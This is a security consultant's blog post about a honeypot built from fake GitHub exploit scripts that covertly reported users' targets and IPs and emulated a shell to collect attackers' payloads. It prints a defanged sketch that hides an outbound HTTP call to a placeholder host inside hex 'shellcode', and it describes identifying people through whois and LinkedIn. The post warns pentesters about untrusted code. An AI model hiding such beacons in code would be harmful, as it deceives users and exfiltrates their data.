“TrstdXploitz” by “L33terman6000”
I’ve been wanting to perform an experiment for some time now and finally got around to it. I present to you what I think is a unique spin on an old idea, a new type of honeypot. Follow along as I explain the adventure that unfolded, including personal threats, Distributed Denial of Service attacks, the Dark Web, and some shocking statistics! Warning: Some egos were likely harmed during the making of this blog.
As a Security Consultant, I’m always advising my clients during web application security assessments to review third-party code before merging it in with their own. I’ve written another blog about not trusting appliances or software on your network just because they claim to help with security. As a penetration tester I often rely on third-party scripts and tools to do my day-to-day job, as do our blue team counterparts. It seems everyone in the cybersecurity industry does, thanks to the vast number of open-source contributions available to the community. When we forensically analyze malware, we take precautions to avoid infecting ourselves and our clients. Why, then, do we feel so comfortable running our infosec tools without checking the source? Is it because they’re open source and we assume something would have been caught? Is it due to their widespread use, or the fact that someone well known in the industry shared them? Is it because of where we got them from? Just to be clear, I’m not above any of you who may be guilty of this. I’m just as much at risk as anyone else, which got me thinking.
As many pentesters do, I often come across new vulnerabilities in customers’ environments which do not yet have weaponized exploit code available in our favorite exploitation frameworks. I turn to proof-of-concept exploits (PoCs) in places such as Exploit-DB and GitHub to see if I can snag something I can use or re-author for my purposes. I know Exploit-DB and GitHub both do some work to validate and filter out malware, and with stars and watchers you can get a sense of how popular the code is. Most exploit code looks pretty similar, with a string of hex characters used as shellcode as part of the payload, and is often written in Python, Ruby, Go, Bash, etc.
I’ve always been a little skeptical of running these proof of concepts/exploits because these “researchers” are also “hackers”, by definition. It’s a bit of a grey area for some who research during the day and moonlight as black hats. I try to take the time to look over the code, at least at a high level, to understand what it is that’s taking place. If there’s hex or another encoding method used, I do my best to deobfuscate and study it. I’ll admit, my effort isn’t always 100%, but it’s enough to make me feel comfortable running the code, at least locally. There’s always this fear in the back of my mind: by getting access to a remote machine, am I unintentionally handing a back door over to a black hat somewhere? Am I infecting my machine, with client data on it, or worse, my client’s environment? This is a BIG responsibility for the security professional that often goes unchecked.
Our clients trust us to keep their environments safe. I’ve had clients in the past who insisted we provide a list of all tools up front that had to be approved and deployed for us beforehand. This seemed like overkill to me at the time, and a major obstacle when, in the moment, you just need to run something ad hoc based on what you encounter. Now, I’m not so sure. Do you feel confident your actions won’t do the opposite? Do you thoroughly review all code before you run it? Do you assume it’s okay because that security professional you follow on Twitter, with seven thousand followers, says you should try it out? (Hint for later on: the answer is no.) Security customers reading this, and even some security folks, are probably thinking this is a no-brainer, that the answers to these questions are a resounding “YES”! I’m here to say you might just be surprised.
Of all the open-source security tools I execute on a daily basis, PoC exploit code gives me the most hesitation. If I’m being honest, I don’t always fully understand exactly what’s going on behind the scenes in order for an exploit, especially Remote Code Execution (RCE), to work. In most cases there is raw shellcode passed along as part of the payload to establish the reverse shell with the client-side script, which can be a little intimidating to look at. The exploit script itself may be written in a language you aren’t as familiar with (for me, that would be Ruby). I was curious how many different types of people use third-party exploit code and how many don’t inspect it. Also, would anyone willingly promote it without me having to advertise it? I’ve noticed malware and vulnerability researchers are often the first to point out whenever there’s a working PoC for a high-profile vulnerability, such as BlueKeep in recent history. I had always assumed black hats, who make their money on exploitation, must be keeping a proactive eye on these somehow. I wanted to know more and see if there was a teachable moment here for all of us, so I came up with an experiment.
This article by TechTarget contains my favorite definition of a traditional Honeypot:
“A honeypot is a network-attached system set up as a decoy to lure cyberattackers and to detect, deflect or study hacking attempts in order to gain unauthorized access to information systems. The function of a honeypot is to represent itself on the internet as a potential target for attackers — usually a server or other high-value target — and to gather information and notify defenders of any attempts to access the honeypot by unauthorized users.”
If we want to study the behaviors of both white hat researchers and black hat hackers, it sounds like we could use a honeypot. However, this wouldn’t be a honeypot in the traditional sense, since the server isn’t sitting somewhere in an environment waiting to be attacked. Instead, the exploit code itself could be booby-trapped to make it appear that the target the attacker has in mind is vulnerable and being actively exploited. Early in this thought experiment I realized I could obtain useful information about the attack, such as the vulnerable target. We don’t have to deploy this anywhere; people are willingly giving us useful information while thinking they’re connecting to these targets successfully. (I can only imagine the roller coaster of emotions. So sorry!) If we could monitor these targets in real time, we could potentially keep an eye out for victims to warn, or proactively monitor them against our own clients’ networks. Also, by providing a fake argument in my script to specify a “local host” for the reverse shell to connect back to, I could build a list of Command and Control servers that may otherwise not be known to the world. Lastly, if I collect the WAN IP address of every request in addition to the “lhost” IP address, I may even know the real IP address of the attacker or researcher, assuming they’re not hiding behind a VPN. This might one day help authorities stop attacks or, for my research, could help identify which organizations are consulting firms or potential clients of security professionals.
My initial idea was to craft a fake PoC Python script for a sought-after CVE and model it after a legitimate one. For anyone looking through the code at a high level, it needed to appear to make a request to the targets in the supplied input, while secretly making another call to a back-end HTTP server which I control in order to collect metadata. To do this, I figured I would obfuscate that portion of the code using a combination of hex and Base64 encoding and make it look like shellcode for the payload. The string would be concatenated and use custom delimiter characters to slow down reversing efforts a little.
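To make the idea concrete, here’s a minimal, defanged sketch of that obfuscation trick. The beacon snippet and the collector URL (collector.example) are invented for illustration, not what I actually used:

```python
import binascii

# The hidden "shellcode": a Python one-liner that phones home,
# hex-encoded so it resembles a raw exploit payload blob.
# (collector.example is a placeholder, not my real server.)
beacon_src = "import urllib.request as u; u.urlopen('https://collector.example/log')"

hex_blob = binascii.hexlify(beacon_src.encode()).decode()
# Re-chunk the hex into \x-style pairs so a skim-reader sees
# something shaped like shellcode, not an HTTP request.
buf = "\\x" + "\\x".join(hex_blob[i:i + 2] for i in range(0, len(hex_blob), 2))

# At runtime the script quietly reassembles and runs it:
recovered = bytes.fromhex(buf.replace("\\x", "")).decode()
# exec(recovered)  # <-- the hidden call; deliberately left commented out here
```

Anyone who actually decoded the blob would see the HTTP request immediately, which is exactly the point of the exercise below.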
I would research current critical Windows RCE CVEs, host the PoC out on GitHub, and wait to see if someone would eventually search for it, without actively advertising anything. What I didn’t anticipate was how much this metadata project would evolve into a fully-fledged honeypot/terminal emulator of its own in an attempt to get more data and Indicators of Compromise (IOCs). I also ran into issues supporting legacy code versions due to a lack of foresight about not being in control of my own repositories.
For those that don’t care about this section, I understand; you may skip along to the statistics and outcomes of the experiment below. However, I want to talk briefly about the setup, as I originally planned to release the source for the front-end and back-end code but have since decided not to. I made this choice out of consideration for research teams who track legitimate exploits and to avoid contributing to more malicious attacks, like back doors being added. This experiment apparently shook things up for research teams and unexpectedly made things difficult for them, which to me just shows how fragile the current system of exploit validation and reporting is.
The client-side code, as pictured above, simply requests input from the user and sends an HTTP request to a PHP web server. The PHP then does a number of things dynamically, but first it validates the input and the source (python), then throws the entire raw command-line argument into a MySQL database. The back-end also records the IP address which made the request and inserts a timestamp. Initially, this is all that would happen, followed by a “Sleep(10)” and a “Connection Terminated: Timeout” message on the client. This allowed me to collect the information previously discussed while appearing to the user to be a faulty PoC.
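Roughly, the flow looked like this. This is a simplified Python sketch with SQLite standing in for the real PHP/MySQL back end; the table layout and one-second sleep are illustrative, not the production code:

```python
import sqlite3
import time

# In-memory stand-in for the MySQL table that collected everything.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE hits (ip TEXT, args TEXT, ts INTEGER)")

def handle_request(ip, user_agent, raw_args):
    # Only talk to python clients (e.g. python-requests/urllib UAs);
    # everything else gets a 404.
    if "python" not in user_agent.lower():
        return 404, ""
    # Log the raw command line, source IP, and a timestamp.
    db.execute("INSERT INTO hits VALUES (?, ?, ?)", (ip, raw_args, int(time.time())))
    db.commit()
    time.sleep(1)  # the live server stalled longer to feel like a hung connection
    return 200, "Connection Terminated: Timeout"

status, body = handle_request(
    "203.0.113.7", "python-requests/2.23",
    "-target 10.0.0.5 -lhost 198.51.100.2")
```

From the user’s side, the script just appears to hang and then fail, while the row of metadata is already in the database.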
As I thought more about this, the web request was already being made to the server, and if I made the server respond to that request instead of just accepting input, I could print the response back to the client. Since the PHP could be dynamic based on the argument supplied, I could create a series of “if” statements that respond differently to simulate a Windows terminal, making it look like a connection had actually been established. This could all be done on the back-end so as not to increase the payload size in the PoC script and potentially tip someone off. The Python script would loop through responses from the web server until no output was returned, so I could still terminate the session with a “timeout”. This was key, because my intent was to make the session seem unstable, encouraging the user to establish their own remote shell for better availability and functionality. I even dropped hints that the server had been used that way already, previously compromised with Empire launchers (empire_lnchr.bat) and Covenant grunts (grunt.exe). What I eventually had was a shell emulator for both Windows (based on CVE) and Linux, done entirely via web requests. I considered taking this a step further and using it as an HTTP proxy against a real Windows VM in an isolated environment, but decided I didn’t need to make it that involved. The goal now was to see if I could get the black hats to provide payloads for their malware, which I could then analyze in a VM. I also got a lot of great input into what commands were run in the wild and could create support for the most common ones as I went along, without changing any of the front-end code. This was key, because I learned that my repositories were being forked at an alarming rate with old code, and I no longer had control over those forks, forcing me to keep copies of back-end code available and separate instances of my database.
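The emulator logic amounted to a big conditional keyed on the command. In Python it would look something like this (the canned outputs below are invented examples, not my actual response set):

```python
# A toy version of the dynamic responses: the real back end was a chain of
# PHP "if" statements keyed on the command; the outputs here are invented.
def fake_shell(cmd):
    cmd = cmd.strip().lower()
    if cmd == "whoami":
        return "nt authority\\system"
    if cmd == "hostname":
        return "WIN-DC01"
    if cmd.startswith("dir"):
        # Breadcrumbs hinting the box was "compromised" before.
        return " Directory of C:\\Users\\Public\n\nempire_lnchr.bat\ngrunt.exe"
    if cmd == "exit":
        return ""  # empty output is what ends the client's response loop
    return f"'{cmd}' is not recognized as an internal or external command."

# The client loops until the server returns no output, then prints
# a "timeout" to make the session feel unstable.
session = [fake_shell(c) for c in ("whoami", "dir", "exit")]
```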
All of the input provided along the way made its way into the MySQL database and was output in real time to a private Slack channel, which I could monitor. The bot names were the names of the CVE scripts so I knew what source it was coming from and URLs within the messages were defanged for my safety and so that Slack wouldn’t unfurl those URLs and tip them off that their requests were being monitored.
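Defanging followed the usual convention of breaking the scheme and the dots so nothing is clickable or unfurlable; something like this simple illustration (not necessarily my exact routine):

```python
# Neutralize the scheme and dots so Slack won't unfurl the link
# (and an accidental click goes nowhere).
def defang(url):
    return url.replace("http", "hxxp").replace(".", "[.]")

defanged = defang("http://198.51.100.2:8080/stager.ps1")
```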
Up and Running
What immediately caught my attention was that after just TWO MINUTES of posting my first PoC to GitHub, I was starting to get requests. This told me that black hats, research groups, or both must have proactive scripts set up to scrape GitHub and various sources for their favorite CVE wish-lists based on the repository name alone. Google wouldn’t have been able to spider the page that quickly. This makes sense to me, especially for financially motivated attackers who need to move quickly and be the first to compromise. I originally expected pentesters such as myself to Google or search GitHub on an as-needed basis, as they came across the vulnerability in an environment. Black hats could likely leverage Shodan or some other source to script the exploitation of multiple vulnerable hosts, which I seem to have witnessed on at least one occasion.
I noticed a pattern in which several people stopped using the script right after issuing the “ipconfig” command. I realized the output wasn’t believable, since the IP address they had provided (whether local or public) wasn’t in it. This was easy to fix: since the PHP was accepting the IP as input, I could reflect it back in the right place in the output, even changing the last octet to “1” to look like the gateway.
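The fix was a tiny bit of string templating, roughly like this sketch (the adapter name and mask are invented; the real version lived in the PHP):

```python
# Reflect the user-supplied IP back into the fake "ipconfig" output,
# and reuse its first three octets with a final ".1" as the gateway.
def fake_ipconfig(supplied_ip):
    gateway = ".".join(supplied_ip.split(".")[:3]) + ".1"
    return (
        "Windows IP Configuration\n\n"
        "Ethernet adapter Ethernet0:\n\n"
        f"   IPv4 Address. . . . . . . . . . . : {supplied_ip}\n"
        "   Subnet Mask . . . . . . . . . . . : 255.255.255.0\n"
        f"   Default Gateway . . . . . . . . . : {gateway}\n"
    )

out = fake_ipconfig("192.168.13.37")
```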
Once the experience kept people interacting for a while and appeared legitimate to them, there was a sharp increase in the number of malicious payloads sent. Specifically, some of the same PowerShell commands I recently witnessed in an Incident Response (IR) engagement were used here to download Cobalt Strike droppers, which would run in memory to establish a new back door. In those IR investigations, the attackers would then typically push other malware, like ransomware, to other areas of the network using the SMB protocol. Since my terminal wasn’t real, it never made the connection back home, which was likely assumed to be blocked by outbound filters or local AV, or the ruse was found out as a honeypot.
Since this was not a comprehensive honeypot, many people did eventually discover it was a hoax, and I received some less-than-pleasant messages aimed at me in the request parameters, along with DDoS attacks, which honestly were a fun challenge. Keeping a little EC2 micro instance standing against black hats trying to take it down in real time was like defending a little house against the big bad wolves. I came up with some unique ways of dynamically adding them to iptables and excluding junk data from ever reaching Slack or the database, which worked well. I also responded with a 404 if the request was not from python, which helped weed out the majority of the less dedicated attacks.
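The filtering boiled down to two cheap checks. Here’s a rough Python sketch; the strike threshold and rule format are illustrative, and the real logic lived on the server (the rule string below is built but never executed):

```python
import re

# Two cheap filters: 404 anything whose User-Agent doesn't look like
# python, and draft an iptables DROP rule for repeat offenders.
PYTHON_UA = re.compile(r"python", re.IGNORECASE)
strikes = {}

def filter_request(ip, user_agent):
    if not PYTHON_UA.search(user_agent):
        strikes[ip] = strikes.get(ip, 0) + 1
        if strikes[ip] >= 3:  # threshold is invented for this sketch
            # Rule we'd hand to the firewall; never run here.
            return 404, f"iptables -A INPUT -s {ip} -j DROP"
        return 404, None
    return 200, None
```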
To my astonishment, well-known individuals in the security community were seemingly convinced my script was legitimate, perhaps based on the output, and shared it with their communities, speeding up the rate of clones and forks. I started getting thousands of requests per day! Other researchers were quick to point out that this was a honeypot. :)
Fortunately, during my experiment I was contacted by some white hat security researchers asking if I had committed the original code. Quentin Herrera (@paragonsec) and Muffinman (@uewuiffnw) were the first blue teamers to reach out and ask me what was going on. I gained a new perspective from both of them and learned there are some great people out there actively hunting for malicious exploits, even though the code initially got by large threat intelligence teams like Insikt Group (Recorded Future).
Recorded Future released their internal post on April 22nd, and it was quickly tweeted by S21SEC. If you look at the spike in traffic both on GitHub and in my database instance, I owe the largest portion of my traffic to that initial communication from S21SEC, since Recorded Future is such a trusted resource for the community.
To their credit, Recorded Future has since been in touch with me to confirm the note pictured here was later updated to reflect that the CVE was a honeypot (April 24th). The note was then removed from their platform altogether on April 27th.
It wasn’t just that communication from Recorded Future, though, which contributed to the popularity of my repositories. My alter ego was cited by Vulnmon for the CVE, and I received mentions from Perch Security and a number of Chinese websites, which I was able to determine based on referer traffic in my GitHub repository analytics. Most of these were removed as soon as Muffinman (Do you know the Muffinman?) reported it to them as well.
As expected, there were social media posts beyond just Twitter, including LinkedIn and Facebook. LinkedIn was particularly interesting because I could see who reacted to the posts and cross-reference their role as pentesters, along with their organization’s IP space, against my collected IP addresses to get an idea of who was running the script. Among the security companies that showed up in my data collection at some point were, to name a few, Check Point, Palo Alto, Verizon, and Cigital (trying to dump lsass via ProcDump). Some of these IP addresses were internal hosts targeting other internal hosts, suggesting they were either testing the script (unlikely, because that would be done in isolation) or using it in a client’s environment. I later ran a script against the captured public IPs, checking whois for any “Org Name” familiar to me. Again, my intent isn’t to pick on any one person or company, but it was shocking to see how willingly people either publicized the PoC without analyzing it first or ran it on faith.
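That whois script was nothing fancy; something along these lines (the org-parsing regex and the sample record are illustrative, and the live lookup requires the `whois` CLI to be installed):

```python
import re
import subprocess

# Pull "OrgName" out of whois output for each captured public IP.
def org_name(whois_text):
    m = re.search(r"^Org-?Name:\s*(.+)$", whois_text, re.IGNORECASE | re.MULTILINE)
    return m.group(1).strip() if m else None

def whois_org(ip):
    # Needs the whois CLI on PATH; failures are simply swallowed here.
    try:
        result = subprocess.run(["whois", ip], capture_output=True,
                                text=True, timeout=10)
        return org_name(result.stdout)
    except (OSError, subprocess.SubprocessError):
        return None

# Invented sample record for illustration:
sample = "NetRange: 203.0.113.0 - 203.0.113.255\nOrgName: Example Consulting LLC\n"
```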
I did also submit one of my PoC scripts to Exploit-DB.com to see if it would end up there, but it must have been caught by the Offensive Security team. Kudos to them, because that would have been a pretty trusted source for a lot of people. They have a “verified” attribute for their scripts, though, so it’s reasonable to assume that with enough effort at obfuscation, or security by obscurity, you could get something past them.
You may be wondering by now how many people would run untrusted code. Thanks to GitHub analytics, I can get a pretty good picture of roughly how many unique individuals cloned my repositories and which sources they arrived from. Keep in mind this experiment ran for only TEN DAYS! Not all of the repositories are even that old. You can imagine how many hits there would be if this were continuous, or if CVE repositories were pushed automatically via a script every time a new RCE came out… In all I used only 7 repositories for malicious CVEs, and I had 48 followers total. That is already more than I have on my personal account, after just a little over a week.
Thanks, GitHub! Now let’s look at some interesting charts derived from data collected in that MySQL database. In these ten days, as of this writing, there were 3,294 rows of data collected from script executions in those seven repositories. My phone continues to ding from Slack alerts as I write this.
You can see above that each CVE had a bit of a shelf life and was typically most popular towards the beginning. This is likely due to researchers and black hats acting quickly and then sharing with their communities that the PoCs were fakes. I would expect penetration testers to stumble across these at a steady, though much lower, rate for a longer period of time. It’s also worth noting that some exploits are much more sought after than others due to factors like ease of exploitability, criticality (CVSS rating), the number of vulnerable targets in scope, etc. Once I implemented the honeypot functionality later on, it was interesting to see things like the most common commands.
Hint: China wins, with the US in second place. This data may look skewed, but remember that not every request used proper syntax with the “-lhost” and “-target” switches, and only the initial requests to the honeypot contained those arguments. All subsequent requests count as requests against those targets, which is why you see much larger numbers in the last chart above for WAN IP addresses.
Now, although I got a good laugh at some of the commands, including repeated attempts to use “ls” on a Windows machine (of which I’m guilty more times than I care to admit), the point of this exercise was to provide a teachable moment for researchers and to look at honeypots from a different angle, possibly shedding new light on black hat activities. Hopefully now everyone will at least give it a second thought before running a script that promises to give you access to a target which is otherwise inaccessible.
With this specific script, learning how to do some basic reverse engineering is key to seeing what’s happening under the hood. For example, if you remove everything except the payload and simply print it to the terminal instead of executing it, you can get an idea of what’s really going on. Also, if you’re hesitant, you can run it in an isolated environment such as a VM, as one researcher told me they did. They used Wireshark to show what was going on behind the scenes without letting it reach my server.
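In practice that means finding the one line that executes the decoded payload and swapping it for a print. Something like this (the hex string here is a harmless stand-in for real shellcode-looking data):

```python
# Safe first pass at an untrusted PoC: decode the payload, but print it
# instead of letting the script exec/os.system/subprocess it.
payload = bytes.fromhex(
    "696d706f727420746869733b2023206e6f74207265616c207368656c6c636f6465"
).decode()

# exec(payload)   # what the malicious script would do
print(payload)    # what you should do first
```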
In my case, I also Base64-encoded the URL for a little extra obfuscation. Decoding that in the terminal below gives you the entire payload in plaintext.
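Decoding a Base64-wrapped value is a one-liner in Python (or `base64 -d` in a shell). The address below is a placeholder round-trip, not my actual endpoint:

```python
import base64

# Round-trip to show the decode step; collector.example is a placeholder.
encoded = base64.b64encode(b"https://collector.example/index.php").decode()
url = base64.b64decode(encoded).decode()
print(url)
```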
Spending a little time to study the code, you should be able to determine (even with deceptively named variables) that this code isn’t doing what it claims to be doing, but instead making an HTTP request with input parameters.
To wrap this up, I urge everyone to please never assume the code you’re using is trusted. As I demonstrated above, it may be intentionally malicious. In my project, what if I had simply modified the Python script to execute any code returned in the HTTP response? I could have actively executed code on those users’ machines instead of just returning text for an emulated terminal. Shells for days, and on security professionals’ machines, no less.
Even if open-source code is from a trusted source, we see examples all the time where malicious components find their way into the main branch without the author’s knowledge. There’s also a chance that exploit code from a source like Exploit-DB, or even code your favorite researcher recommends, got its malicious component past them by simply looking legitimate enough to pass along. Yes, it is a pain to comb through, and it’s not always practical for large tool sets such as the Metasploit Framework. However, it is entirely doable for the majority of scripts that we penetration testers rely on. We need to at least do our due diligence, just like we do with closed-source binaries. I’d also like to see us as a community slow down a bit when a new exploit pops up and come up with a better process for vetting them. At the most extreme level, perhaps organizations should vet software used by penetration teams and make risk determinations in the same manner as any other software run on organization systems, by a change advisory board. I don’t think we need to handicap our red teams, but perhaps new tools should be reviewed while keeping a running list of approved ones, putting extra scrutiny on anything new.
Let’s keep ourselves and our customers’ environments safe! Thanks, everyone, for your time!
P.S. When I published this blog I took down my repositories and terminated the server. If you ran my code, I hope you’ll forgive me for any time loss and anxiety caused by figuring out it wasn’t legitimate. I can assure you only data was collected for these statistics and will not be shared with anyone. If you ran it post 4/27/20 the server isn’t accessible and isn’t collecting anything.
Shortly after releasing this blog, another security researcher (@patrickriggs) posted his perspective as a victim of this honeypot. His account is beautifully written, has a humble approach, and it’s certainly worth a read @ https://patrickriggs.com/blog/a-tale-of-two-pocs-or-how-i-learned-to-stop-worrying-and-love-the-honeypot/.